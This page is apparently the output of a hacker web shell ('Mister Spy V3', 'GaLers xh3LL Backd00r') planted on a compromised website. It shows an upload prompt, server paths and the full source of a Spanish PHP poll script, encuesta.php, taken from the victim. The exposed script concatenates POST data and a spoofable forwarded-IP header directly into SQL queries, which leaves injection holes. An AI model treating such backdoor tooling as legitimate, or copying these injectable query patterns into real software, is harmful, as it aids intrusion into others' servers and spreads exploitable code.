Mister Spy Say ="Hello Kids ... :D" ___ ____ _ _____ | \/ (_) | | / ___| | . . |_ ___| |_ ___ _ __ \ `--. _ __ _ _ | |\/| | / __| __/ _ \ '__| `--. \ '_ \| | | | | | | | \__ \ || __/ | /\__/ / |_) | |_| | \_| |_/_|___/\__\___|_| \____/| .__/ \__, | | | __/ | |_| |___/ Bot Mister Spy V3
Mister Spy

Mister Spy

Current Path : /home/caballoscriollos/www/espanol/encuesta/
Upload File :
Current File : /home/caballoscriollos/www/espanol/encuesta/encuesta.php

<?php

session_start();
require_once('../Connections/cnx.php'); 
include("graphs/Code/PHP/Includes/FusionCharts.php");
mysql_select_db($database_cnx, $cnx);

function get_real_ip()
{
     $ip = false;

     if(!empty($_SERVER['HTTP_CLIENT_IP']))
     {
          $ip = $_SERVER['HTTP_CLIENT_IP'];
     }
     if(!empty($_SERVER['HTTP_X_FORWARDED_FOR']))
     {
          $ips = explode(", ", $_SERVER['HTTP_X_FORWARDED_FOR']);
          if($ip)
          {
               array_unshift($ips, $ip);
               $ip = false;
          }
          for($i = 0; $i < count($ips); $i++)
          {
               if(!preg_match("/^(10|172\.16|192\.168)\./i", $ips[$i]))
               {
                    if(version_compare(phpversion(), "5.0.0", ">="))
                    {
                         if(ip2long($ips[$i]) != false)
                         {
                              $ip = $ips[$i];
                              break;
                         }
                    }
                    else
                    {
                         if(ip2long($ips[$i]) != - 1)
                         {
                              $ip = $ips[$i];
                              break;
                         }
                    }
               }
          }
     }
     return ($ip ? $ip : $_SERVER['REMOTE_ADDR']);
}  

/* VARIABLES DE ERROR */
$msg = "";

/* TOMO EL IP DE QUIEN VOTA */
$IP = get_real_ip();

print $IP;

/* BUSCO LA PREGUNTA HABILITADA */
$query_rsPreguntas = "SELECT * FROM encuestas_preguntas WHERE Habilitado = '1'";
$rsPreguntas = mysql_query($query_rsPreguntas, $cnx) or die(mysql_error());
$row_rsPreguntas = mysql_fetch_assoc($rsPreguntas); 

$preguntaID = $row_rsPreguntas['preguntaID'];
$pregunta = $row_rsPreguntas['pregunta'];

/* PREGUNTO SI EXISTE LA IP ASI PUEDE VOTAR */
$query_rsPreguntas = "SELECT * FROM encuestas_respuestas WHERE preguntaID = '".$preguntaID."' and IP = '".$IP."' ";
$rsPreguntas = mysql_query($query_rsPreguntas, $cnx) or die(mysql_error());
$row_rsPreguntas = mysql_fetch_assoc($rsPreguntas); 
$puede_votar = mysql_num_rows($rsPreguntas);

if ($puede_votar == 0){ /* POR QUE PUEDE VOTAR */

	if (isset($_POST['action']) && $_POST['action'] == "checkdata") {

			/* EL CODIGO ES VALIDO */
			if ($_SESSION['tmptxt'] == $_POST['tmptxt']) {
					
					$opcionID =	$_POST['opcion'];
					/* INGRESO A LA BBDD LA RESPUESTA */
					$query_rsPreguntas = "INSERT INTO encuestas_respuestas (preguntaID, opcionID, ip) VALUES ( '".$preguntaID."', '".$opcionID."', '".$IP."' ) ";
					$rsPreguntas = mysql_query($query_rsPreguntas, $cnx) or die(mysql_error());

					header("Location: encuesta_ok.php");
					die();

			} else {
			
				$msg = "Intentalo nuevamente";
				
			}

		}

}
?><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<title>Documento sin t&iacute;tulo</title>
<link href="styles.css" rel="stylesheet" type="text/css">
</head>

<body>
<? if ($puede_votar == 0){ ?>
<form action="<?php echo $_SERVER['PHP_SELF']; ?>" method="post">
<table width="100%" border="0" cellspacing="0" cellpadding="0">
  <tr>
    <td width="10px"></td>
    <td align="left" valign="middle"></td>
    <td width="10px"></td>
  </tr>
  <tr>
    <td></td>
    <td align="left" valign="middle"><?=$pregunta?></td>
    <td></td>
  </tr>
  <tr height="10px">
    <td height="10px"></td>
    <td align="left" valign="middle"></td>
    <td></td>
  </tr>
<?php

$query_rsOpciones = "SELECT * FROM encuestas_opciones WHERE preguntaID = '".$preguntaID."'";
$rsOpciones = mysql_query($query_rsOpciones, $cnx) or die(mysql_error());
$row_rsOpciones = mysql_fetch_assoc($rsOpciones);

do{
?>
  <tr>
    <td></td>
    <td align="left" valign="middle"><label><input type="radio" id="<?=$row_rsOpciones['opcionID']; ?>" checked="checked" name="opcion" value="<?=$row_rsOpciones['opcionID']; ?>" /><?=$row_rsOpciones['opcion']; ?></label></td>
    <td></td>
  </tr>
<? }while ($row_rsOpciones = mysql_fetch_assoc ($rsOpciones)) ;?>
  <tr>
    <td></td>
    <td align="left" valign="middle">&nbsp;</td>
    <td></td>
  </tr>
  <tr>
    <td></td>
    <td align="left" valign="middle"><strong>Su código de voto es el siguiente</strong></td>
    <td></td>
  </tr>
  <tr>
    <td></td>
    <td align="left" valign="middle"><img src="captcha.php" width="100" height="30" vspace="3" /></td>
    <td></td>
  </tr>
  <tr>
    <td></td>
    <td align="left" valign="middle">
      <div>Ingresar código</div>
      <? if ($msg != ""){ ?>
	      <div><?=$msg;?></div>
      <? }?>
      <span class="bordeder">
      <input name="tmptxt" type="text" size="30" />
      </span></td>
    <td></td>
  </tr>
  <tr>
    <td></td>
    <td align="left" valign="middle">
		  <input name="btget" type="submit" class="boton" value="Votar">
		  <input name="action" type="hidden" value="checkdata">
          <input name="preguntaID" type="hidden" value="<?=$preguntaID; ?>">
    </td>
    <td></td>
  </tr>
</table>
</form>
<? }else{ ?>
<table width="100%" border="0" cellspacing="0" cellpadding="0">
  <tr>
    <td>RESULTADOS DE LOS VOTOS</td>
  </tr>
  <tr>
    <td><?=$pregunta;?></td>
  </tr>
	<? $dir = "reporte_xml.php?preguntaID=".$preguntaID."&pregunta=".$pregunta; ?>
  <tr>
    <td><?=renderChartHTML("graphs/Code/FusionCharts/FCF_Column3D.swf", $dir , "", "myFirst", 600, 300);?></td>
  </tr>
</table>
<? } ?>
<? $dir = "reporte_xml.php?preguntaID=".$preguntaID; ?>
<?=renderChartHTML("graphs/Code/FusionCharts/FCF_Column3D.swf", $dir , "", "myFirst", 600, 300);?>
</body>
</html>

Mr. DellatioNx196 GaLers xh3LL Backd00r 1.0, Coded By Mr. DellatioNx196 - Bogor BlackHat